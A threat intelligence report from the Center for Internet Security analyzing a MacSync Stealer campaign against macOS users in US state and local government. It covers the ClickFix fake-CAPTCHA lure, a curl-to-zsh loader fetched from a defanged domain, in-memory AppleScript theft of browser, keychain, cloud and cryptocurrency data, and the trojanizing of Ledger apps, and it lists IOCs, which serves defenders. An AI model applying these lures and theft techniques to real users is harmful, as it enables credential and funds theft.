MacSync Stealer Campaign Impacting U.S. SLTT macOS Users

The Center for Internet Security^® (CIS^®) Cyber Threat Intelligence (CTI) team identified an ongoing MacSync Stealer campaign impacting macOS users in U.S. State, Local, Tribal, and Territorial (SLTT) government organizations through the ClickFix social engineering technique.

Following a submission from a U.S. SLTT organization, CIS CTI identified a broader opportunistic campaign using fake CAPTCHAs and a ClickFix lure delivered through search engine optimization (SEO) poisoning, with payload capabilities designed to maximize the types of impacted web browsers.

CIS CTI assesses it is highly likely threat actors will continue leveraging ClickFix variants to impact U.S. SLTTs throughout 2026 due to the technique’s scalability, ease of implementation, and ability to compromise multiple victims quickly.

A Brief Note on MacSync Stealer

MacSync Stealer is a macOS infostealer that malware developers lease to other cybercriminals in a Malware as a Service (MaaS) operation. Cybercriminals leverage SEO poisoning to steer victims to malicious websites that use fake ClickFix CAPTCHAs for payload delivery.

The threat actors behind MacSync Stealer continuously update the malware in response to defensive countermeasures and changing operational conditions.

Evolution at Work in a MacSync Stealer Campaign

At the time of publication, Sophos X-Ops tracked three distinct MacSync Stealer campaigns, and it observed a deliberate evolution in delivery mechanism, lure themes, and payload architecture across each iteration.

The third of these tracked campaigns started in February 2026. It includes the incident analyzed in this report and represents a significant evolution in payload architecture. While the ClickFix social engineering core of the attack is retained, the malware developers replaced native Mach-O binary delivery with a multistage Loader as a Service (LaaS) model using shell-based loaders, API key-gated command and control (C2) infrastructure, dynamic AppleScript payloads, and aggressive in-memory execution, as reported by CloudSEK. Sophos X-Ops assessed that this architectural shift was a deliberate adaptation to increasing macOS operating system and security tool restrictions that had reduced the effectiveness of binary-based delivery.

Technical Analysis of the Campaign

CIS CTI's analysis of this campaign began when a member of the Multi-State Information Sharing and Analysis Center^® (MS-ISAC^®) submitted a MacSync Stealer sample from a confirmed infection. The sample included a Zsh shell script and an AppleScript payload, which enabled the team to reconstruct the attack’s kill chain.

This incident began when the victim was socially engineered into executing a malicious Terminal command after being redirected from a search result for a free e-Book download. Rather than delivering the requested document, the malicious search result, elevated through SEO poisoning, redirects the victim to a fake CAPTCHA page hosted at hxxp://filegrowthlabs[.]com/s3/?c=AA-0uWlVgQUAHYwCAFVTOQASAAAAAACP, as shown in Figure 1.

^{Figure 1: Fake CAPTCHA & ClickFix technique}

The page instructs the victim to open the Terminal and paste a malicious Base64-encoded command, shown below in Figure 2.

^{Figure 2: Base64 ClickFix command}

When decoded, the command instructs the Terminal to display the message "Installing package please wait..." while silently executing a curl command that retrieves a remote Zsh shell script from hxxp://mansfieldpediatrics[.]com/curl/ b2955c54eb0c047463993b379e015e737aabed37b456aeb0957cf84cdb0ed1f0 and pipes it directly into Zsh for immediate execution. The C2 domain impersonates a pediatric medical practice, and the /curl/ bootstrap endpoint path uses a 64-character hexadecimal authentication token that functions as both a victim correlation identifier and a mechanism to restrict payload execution in sandbox environments, per Sophos X-Ops. CIS CTI identified that the /s3/ path in the victim's infection URL directly matches the Build Tag s3 embedded in the malware's own self-identification metadata, confirming this URL functions as the dedicated landing page for the s3 affiliate build within the MacSync MaaS operation.

During analysis, a critical C2 infrastructure link was identified. Sophos X-Ops published a deobfuscated script excerpt showing the hardcoded API key value 5190ef1733183a0dc63fb623357f56d6 alongside a different C2 domain, houstongaragedoorinstallers[.]com, in a separate MacSync Stealer sample from the same campaign period. This API key is identical to the value hardcoded in the Zsh shell script downloaded to the MS-ISAC victim’s system, confirming that the same MaaS threat actor is rotating C2 domains while maintaining a common authentication key across deployments. This key functions as a persistent campaign fingerprint; any file, URL, or domain in threat intelligence platforms containing this value can be attributed to the same MacSync MaaS infrastructure.

CIS CTI also identified that the AppleScript payload writes a hardcoded victim IP address into the info file it creates within the staging directory alongside system profiler output, username, and collected password. This indicates the C2 server is injecting victim-specific metadata into the payload at the time of delivery, providing further evidence that payload generation is dynamic per victim rather than static.

Inside the Campaign's Kill Chain

Once downloaded and executed, the Zsh script immediately detaches from the Terminal and begins running silently in the background. After establishing background execution, the script authenticates to the C2 server using its hardcoded API key and authentication token, and it then retrieves the Stage 2 AppleScript payload.

Notably, if the victim's system password was already obtained prior to this request, the script passes suggesting the C2 uses the password to tailor or pre-configure the Stage 2 payload on a per-victim basis prior to delivery. Upon delivery, the AppleScript payload is passed directly into the macOS’s native osascript interpreter and executed entirely in memory. This approach leverages a signed, Apple-native executable as a defense‑evasion technique to bypass endpoint detection rules.

The AppleScript begins execution by forcibly terminating the Terminal application to suppress visible shell activity. It then identifies the current username and creates a randomly named staging directory at /tmp/sync[7‑digit‑random]/ for data collection.

Next, the payload attempts to obtain the victim’s macOS account password, which is required for decrypting Keychain items and accessing protected data. If the account has no password set, the script proceeds without user interaction. If a password is required, the payload displays a deceptive System Preferences style authentication dialog using the legitimate macOS system icon and the prompt: “Required Application Helper. Please enter password for continue.” The dialog offers no cancel option and loops indefinitely until the correct password is entered.

Once the AppleScript has the access it needs, it collects the data and compiles it into an archive it creates in the temp directory, /tmp/osalogging.zip. The victim in this case reported encountering this fake prompt and seeing the message: “Your Mac does not support this application. Try reinstalling or downloading the version for your system,” which the malware presents after data collection completes to mask suspicious behavior, as noted by CloudSEK.

Once the AppleScript finishes and the archive is detected, the Zsh shell script exfiltrates the file in 10 MB segments via HTTP PUT requests to the C2 server. To ensure delivery, the script will conduct up to eight retry attempts utilizing an incremental backoff strategy. Sophos X-Ops notes all evidence is deleted after successful exfiltration of the archive.

AppleScript Infostealer Payload Analysis

The AppleScript infostealer payload implements nine distinct data collection modules targeting browsers, credentials, cryptocurrency wallets, system data, and sensitive files. The following sections detail the modules most relevant to U.S. SLTT organizations.

Browser and Credential Theft

The payload targets 13 Chromium-based browsers and four Gecko-based browsers simultaneously. For each detected browser profile, the payload copies the Cookies, Login Data, Web Data, Local Extension Settings, and IndexedDB directories.

Separately from credential collection, the payload executes a dedicated second pass over the same browser profiles specifically targeting over 80 browser extension IDs associated with cryptocurrency wallet extensions, extracting Local Extension Settings and IndexedDB data for each. This is implemented as a distinct module from general browser credential theft, indicating deliberate and targeted wallet-specific collection logic.

System Data Theft

Beyond browser data, the payload harvests the macOS Keychain database, SSH private keys, AWS credentials, Kubernetes configuration files, and other cloud provider key material from the user profile directory. The Telegram Desktop application's local data directory is copied in its entirety, as reported by Imperva, enabling account takeover without requiring the victim's password or bypassing two-factor authentication. The payload also copies shell history files, which frequently contain SSH connection commands exposing internal server addresses and usernames, API tokens entered inline during command-line operations, database connection strings, and cloud provider Command Line Interface (CLI) commands revealing infrastructure details, suggesting this collection module is a potential corporate network pivot capability beyond the direct impact to the victim user.

Additionally, the payload collects Safari browser data, including cookies, autofill form values, and browsing history, as well as the victim's Apple Notes database and files matching common sensitive extensions across the victim's Desktop, Documents, and Downloads directories. The payload adapts its file collection behavior based on the permission level it obtains on the victim system, using more aggressive collection methods if Full Disk Access is available.

Cryptocurrency Wallet Theft and Ledger Hardware Wallet Trojanization

The MacSync Stealer payload includes extensive cryptocurrency‑theft functionality, targeting more than 80 browser‑based wallet extensions and over 20 desktop wallet applications to extract stored data and credentials, per Hive Pro. Its most critical capability is the trojanization of installed Ledger hardware‑wallet applications in which the malware replaces the application's core application files with malicious versions downloaded from the C2. Sophos X-Ops' analysis of the modified Ledger application showed it contains injected code that captures entered seed phrases and exfiltrates them directly to a separate attacker-controlled endpoint entirely distinct from the primary C2 infrastructure. This backdoor persists even after MacSync Stealer itself is removed, allowing seed‑phrase theft to occur the next time the victim opens the compromised Ledger application, as shared by CloudSEK.

If either Ledger application was opened following the estimated infection window, the seed phrases associated with any wallets accessed through those applications should be treated as compromised regardless of whether MacSync Stealer itself has been removed, as the backdoored application will continue to silently exfiltrate seed phrases on each subsequent launch.

Counter macOS Threats through Collective Cyber Defense

CIS CTI recommends U.S. SLTTs join the MS-ISAC, a community dedicated to the Collective Cyber Defense of U.S. SLTTs. MS-ISAC members received early reporting on the MacSync Stealer malware campaign, including over 1,000 indicators of compromise (IOCs) disseminated through our Indicator Sharing Program. Additionally, members can take advantage of proactive web security through the Malicious Domain Blocking and Reporting (MDBR) service, which blocked over 2.5 million DNS requests related to the MacSync Stealer malware campaign at the time of publication. Finally, CIS CTI team provided membership with a more detailed report on the MacSync Stealer campaign, including IOCs and recommendations. This information is intended to provide actionable threat intelligence that directly supports proactive Collective Cyber Defense in the U.S. SLTT community along with informed decision-making.

Ready to protect your U.S. SLTT's macOS devices against threats like MacSync Stealer?